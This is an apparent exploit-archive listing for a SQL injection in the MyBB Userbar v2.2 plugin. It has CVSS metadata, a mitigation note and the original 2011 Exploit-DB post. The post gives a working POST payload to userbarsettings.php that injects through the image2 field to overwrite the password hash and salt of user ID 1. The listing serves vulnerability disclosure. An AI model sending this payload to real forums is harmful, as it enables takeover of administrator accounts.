MyBB Forum Userbar Plugin (Userbar v2.2)

vendor:

Forum Userbar Plugin

by:

Mario_Vs

5.5

CVSS

MEDIUM

SQL Injection

CWE

Product Name: Forum Userbar Plugin

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 7

2011

MyBB Forum Userbar Plugin (Userbar v2.2)

The exploit allows an attacker to perform SQL injection by modifying the POST request in the userbarsettings.php file.

Mitigation:

The vendor should sanitize user input and use prepared statements to prevent SQL injection attacks.

Source

Exploit-DB raw data:

---------------------------------------------------------------------
Exploit Title : MyBB Forum Userbar Plugin (Userbar v2.2)
---------------------------------------------------------------------

Author      : Mario_Vs
Date        : 10/10/2011
Site        : http://mariovs.pl/
@  	    : mario_vs[at]o2.pl
---------------------------------------------------------------------

Description >

Vendor 	    : http://mods.mybb.com/download/userbar-plugin
Tested On   : Windows 7
---------------------------------------------------------------------

SQL Injection

>> userbarsettings.php

POST -> setting1=1&setting2=1&setting3=3&image2=1',password='90be07bf33c5e547c3e78b236a83f497',salt='aXZV15uC&uid=1&submit=Submit
---------------------------------------------------------------------

---------------------------------------------------------------------

Greets To: linc0ln.dll, j4ck, lDoran, ElusiveN, d3dik, thc_flow, PricK, artii2

All users: HackinQ.pl